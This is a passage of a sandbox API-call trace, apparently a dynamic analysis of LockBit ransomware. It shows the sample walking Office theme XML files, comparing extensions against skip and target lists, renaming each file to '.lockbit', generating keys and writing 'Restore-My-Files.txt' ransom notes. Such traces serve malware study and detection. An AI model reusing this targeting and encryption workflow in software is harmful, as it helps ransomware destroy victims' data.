Colors\\") returned="" [0193.894] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Thatch.xml") returned=".xml" [0193.894] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0193.894] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0193.894] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0193.894] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0193.894] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0193.894] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0193.894] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0193.894] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0193.894] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0193.894] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0193.894] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0193.894] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0193.894] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0193.894] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0193.894] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0193.894] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0193.894] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0193.894] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0193.895] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0193.895] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0193.895] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0193.895] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0193.895] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0193.895] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0193.895] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0193.895] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0193.895] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0193.895] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0193.895] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Thatch.xml.lockbit") returned 85 [0193.895] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Thatch.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\thatch.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0193.896] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0193.897] malloc (_Size=0x40068) returned 0x1ff1e60 [0193.897] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=961) returned 1 [0193.897] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.897] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.897] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0193.897] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.898] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.898] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0193.898] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0193.900] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Thatch.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Thatch.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0193.900] malloc (_Size=0xc0) returned 0x1fa2ed8 [0193.900] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc0, FileInformationClass=0xa) returned 0x0 [0193.902] free (_Block=0x1fa2ed8) [0193.902] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Thatch.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors") returned 1 [0193.902] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt") returned 87 [0193.902] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0193.902] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd4d0a00, ftCreationTime.dwHighDateTime=0x1cac1e0, ftLastAccessTime.dwLowDateTime=0x51cc30d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfd4d0a00, ftLastWriteTime.dwHighDateTime=0x1cac1e0, nFileSizeHigh=0x0, nFileSizeLow=0x3bf, dwReserved0=0x0, dwReserved1=0x0, cFileName="Trek.xml", cAlternateFileName="")) returned 1 [0193.902] lstrcmpiW (lpString1=".", lpString2="Trek.xml") returned -1 [0193.902] lstrcmpiW (lpString1="..", lpString2="Trek.xml") returned -1 [0193.902] PathFindExtensionW (pszPath="Trek.xml") returned=".xml" [0193.902] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0193.902] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0193.902] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0193.902] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0193.902] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0193.902] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0193.902] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0193.902] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0193.902] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0193.902] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0193.903] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0193.903] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0193.903] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0193.903] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0193.903] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0193.903] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0193.903] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0193.903] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0193.903] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0193.903] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0193.903] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0193.903] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0193.903] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0193.903] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0193.903] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0193.903] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0193.903] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0193.903] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0193.903] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0193.903] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0193.903] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0193.903] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0193.904] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0193.904] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0193.904] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0193.904] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0193.904] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0193.904] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0193.904] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0193.904] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0193.904] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0193.904] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0193.904] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0193.904] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0193.904] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0193.904] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0193.904] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0193.904] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Trek.xml") returned -1 [0193.904] lstrcmpiW (lpString1="ntldr", lpString2="Trek.xml") returned -1 [0193.904] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Trek.xml") returned -1 [0193.904] lstrcmpiW (lpString1="bootsect.bak", lpString2="Trek.xml") returned -1 [0193.904] lstrcmpiW (lpString1="autorun.inf", lpString2="Trek.xml") returned -1 [0193.904] lstrcmpiW (lpString1="thumbs.db", lpString2="Trek.xml") returned -1 [0193.904] lstrcmpiW (lpString1="iconcache.db", lpString2="Trek.xml") returned -1 [0193.904] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\") returned="" [0193.905] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Trek.xml") returned=".xml" [0193.905] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0193.905] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0193.905] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0193.905] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0193.905] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0193.905] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0193.905] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0193.905] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0193.905] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0193.905] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0193.905] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0193.905] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0193.905] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0193.905] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0193.905] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0193.905] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0193.905] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0193.905] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0193.905] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0193.905] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0193.905] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0193.906] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0193.906] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0193.906] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0193.906] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0193.906] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0193.906] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0193.906] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0193.906] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Trek.xml.lockbit") returned 83 [0193.906] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Trek.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\trek.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0193.907] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0193.907] malloc (_Size=0x40068) returned 0x3d70450 [0193.908] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=959) returned 1 [0193.908] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.908] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.908] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0193.908] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.909] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.909] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0193.909] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0193.915] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Trek.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Trek.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0193.915] malloc (_Size=0xbc) returned 0x1fa2ed8 [0193.915] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xbc, FileInformationClass=0xa) returned 0x0 [0193.916] free (_Block=0x1fa2ed8) [0193.916] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Trek.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors") returned 1 [0193.916] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt") returned 87 [0193.916] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0193.916] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe7e3700, ftCreationTime.dwHighDateTime=0x1cac1e0, ftLastAccessTime.dwLowDateTime=0x603f4990, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfe7e3700, ftLastWriteTime.dwHighDateTime=0x1cac1e0, nFileSizeHigh=0x0, nFileSizeLow=0x3c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Urban.xml", cAlternateFileName="")) returned 1 [0193.916] lstrcmpiW (lpString1=".", lpString2="Urban.xml") returned -1 [0193.916] lstrcmpiW (lpString1="..", lpString2="Urban.xml") returned -1 [0193.916] PathFindExtensionW (pszPath="Urban.xml") returned=".xml" [0193.916] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0193.916] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0193.916] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0193.916] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0193.916] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0193.917] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0193.917] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0193.917] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0193.917] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0193.917] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0193.917] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0193.917] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0193.917] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0193.917] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0193.917] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0193.917] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0193.917] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0193.917] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0193.917] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0193.917] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0193.917] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0193.917] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0193.917] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0193.917] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0193.917] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0193.917] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0193.917] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0193.918] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0193.918] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0193.918] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0193.918] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0193.918] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0193.918] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0193.918] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0193.918] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0193.918] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0193.918] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0193.918] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0193.918] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0193.918] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0193.918] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0193.918] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0193.918] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0193.918] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0193.918] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0193.918] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0193.918] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0193.918] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Urban.xml") returned -1 [0193.918] lstrcmpiW (lpString1="ntldr", lpString2="Urban.xml") returned -1 [0193.919] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Urban.xml") returned -1 [0193.919] lstrcmpiW (lpString1="bootsect.bak", lpString2="Urban.xml") returned -1 [0193.919] lstrcmpiW (lpString1="autorun.inf", lpString2="Urban.xml") returned -1 [0193.919] lstrcmpiW (lpString1="thumbs.db", lpString2="Urban.xml") returned -1 [0193.919] lstrcmpiW (lpString1="iconcache.db", lpString2="Urban.xml") returned -1 [0193.919] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\") returned="" [0193.919] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Urban.xml") returned=".xml" [0193.919] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0193.919] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0193.919] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0193.919] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0193.919] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0193.919] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0193.919] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0193.919] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0193.919] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0193.919] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0193.919] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0193.919] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0193.919] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0193.919] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0193.919] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0193.920] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0193.920] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0193.920] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0193.920] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0193.920] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0193.920] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0193.920] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0193.920] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0193.920] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0193.920] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0193.920] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0193.920] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0193.920] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0193.920] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Urban.xml.lockbit") returned 84 [0193.920] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Urban.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\urban.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0193.921] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0193.921] malloc (_Size=0x40068) returned 0x3f70048 [0193.921] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=960) returned 1 [0193.921] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.922] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.922] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0193.922] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.922] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.922] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0193.922] ReadFile (in: hFile=0x308, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0193.928] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Urban.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Urban.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0193.928] malloc (_Size=0xbe) returned 0x1fa2ed8 [0193.928] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xbe, FileInformationClass=0xa) returned 0x0 [0193.929] free (_Block=0x1fa2ed8) [0193.929] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Urban.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors") returned 1 [0193.929] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt") returned 87 [0193.929] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0193.929] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xffaf6400, ftCreationTime.dwHighDateTime=0x1cac1e0, ftLastAccessTime.dwLowDateTime=0x603f4990, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xffaf6400, ftLastWriteTime.dwHighDateTime=0x1cac1e0, nFileSizeHigh=0x0, nFileSizeLow=0x3c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Verve.xml", cAlternateFileName="")) returned 1 [0193.929] lstrcmpiW (lpString1=".", lpString2="Verve.xml") returned -1 [0193.929] lstrcmpiW (lpString1="..", lpString2="Verve.xml") returned -1 [0193.929] PathFindExtensionW (pszPath="Verve.xml") returned=".xml" [0193.929] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0193.930] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0193.930] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0193.930] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0193.930] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0193.930] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0193.930] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0193.930] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0193.930] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0193.930] 